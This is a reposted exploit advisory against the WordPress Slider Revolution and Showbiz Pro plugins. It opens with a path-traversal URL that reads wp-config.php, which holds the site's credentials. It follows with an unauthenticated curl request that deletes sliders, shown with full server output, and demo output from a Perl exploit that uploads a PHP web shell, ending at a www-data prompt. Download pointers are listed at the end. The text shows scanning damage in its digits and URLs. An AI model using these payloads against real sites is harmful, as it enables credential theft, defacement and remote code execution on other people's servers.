Any read:
/wp-admin/admin-ajax. php? action=revslider_show_image&img=…/wp-config.php
Any upload:
#!/ usr/bin/perl
Title: Slider Revolution/Showbiz Pro shell upload exploit
Author: Simo Ben youssef
Contact: Simo_at_Morxploit_com
Discovered: 1 5 October 2 0 1 4
Coded: 1 5 October 2 0 1 4
Updated: 2 5 November 2 0 1 4
Published: 2 5 November 2 0 1 4
MorXploit Research
Vendor: ThemePunch
Software: Revslider/Showbiz Pro
Versions: <= 3.0.95 (Revslider) / Version: <= 1.7.1 (Showbiz Pro)
Products url:
Vulnerable scripts:
revslider/revslider_admin.php
showbiz/showbiz_admin.php
About the plugins:
The #1 Slider plugin, used by millions, slider revolution is an all-purpose slide displaying solution that allows for showing almost any
kind of content whith highly customizable, transitions, effects and custom animations.
Showbiz Pro is a responsive teaser displaying solution that allows you to show WordPress Posts or any Custom Content with a set
amount of teaser items.
Description:
Slider Revolution and Showbiz Pro fail to check authentication in revslider_admin.php/showbiz_admin.php allowing an unauthenticated
attacker to abuse administrative features.
Some of the features include:
Creating/Deleting/Updating sliders
Importing/exporting sliders
Updading plugin
For a full list of functions please see revslider_admin.php/showbiz_admin.php
PoC on revslider:
1 - Deleting a slider:
root@host:/home/rootuser# curl-v --data “action=revslider_ajax_action&client_action=delete_slider&data[sliderid]=1”
http://****. com/wp-admin/admin-ajax.php
* Connected to****. com(...) port 8 0 (#0)
> POST /wp-admin/admin-ajax.php HTTP/1.1
> User-Agent: curl/7.35.0
> Host:****. com
> Accept: /
> Content-Length: 7 3
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 7 3 out of 7 3 bytes
< HTTP/1.1 2 0 0 OK
< Date: Fri, 2 4 Oct 2 0 1 4 2 3:2 5:0 7 GMT
* Server Apache/2.4.6 (Unix) OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 is not blacklisted
< Server: Apache/2.4.6 (Unix) OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
< X-Powered-By: PHP/5.4.18
< X-Robots-Tag: noindex
< X-Content-Type-Options: nosniff
< Expires: Mon, 1 1 Jan 1 9 8 4 0 5:0 0:0 0 GMT
< Cache-Control: no-cache, must-revalidate, max-age=0
< Pragma: no-cache
< X-Frame-Options: SAMEORIGIN
< Set-Cookie: PHPSESSID=a23ex1c8a573f1d1xd28c301793ba022c; path=/
< Transfer-Encoding: chunked
< Content-Type: text/html; charset=UTF-8
<
* Connection #0 to host http://****. com left intact
{“success”:true,“message”:“The slider deleted”,“is_redirect”:true,“redirect_url”:“http://****. com/wp-admin/admin. php? page=revslider&view=sliders”}
2 - Uploading an web shell:
The following perl exploit will try to upload an HTTP php shell through the the update_plugin function
To use the exploit make sure you download first the revslider.zip and showbiz.zip files which contain cmd.php
and save them it in the same directory where you have the exploit.
Demo:
===================================================
— Revslider/Showbiz shell upload exploit
— By: Simo Ben youssef <simo_at_morxploit_com>
===================================================
[*] Target set to revslider
[*] Sent payload
[+] Payloadsuccessfully executed
[*] Checking if shell was uploaded
[+] Shell successfully uploaded
Linux MorXploit 3.13.0-2 4-generic #4 7-Ubuntu SMP Fri May 2 2 3:3 0:0 0 UTC 2 0 1 4 x86_64 x86_64 x86_64 GNU/Linux
uid=3 3(www-data) gid=3 3(www-data) groups=3 3(www-data)
www-data@MorXploit:~$
Download:
Exploit:
Exploit update zip files:
Requires LWP::UserAgent
apt-get install libwww-perl
yum install libwww-perl
[1] [2] [3] next